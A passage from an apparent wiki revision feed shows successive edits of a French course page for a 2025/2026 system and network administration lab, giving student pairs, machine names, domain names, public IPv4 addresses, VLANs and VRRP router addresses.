| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere.online|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elvis||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| || Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11294</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11294"/>
		<updated>2026-01-20T17:26:00Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere.online|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elvis||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.161|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.177|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| || Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.166&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11288</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11288"/>
		<updated>2026-01-20T16:57:10Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere.online|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || || SE4.Elvis||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.161|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 172.60.0.1|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| || Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.166&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11250</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11250"/>
		<updated>2026-01-20T13:56:05Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || || SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || || SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || || ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| || Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| || || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| || || Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| || || Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| || || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| || || Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| || || Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_construction_de_r%C3%A9seau_2025/2026&amp;diff=10527</id>
		<title>SE4 construction de réseau 2025/2026</title>
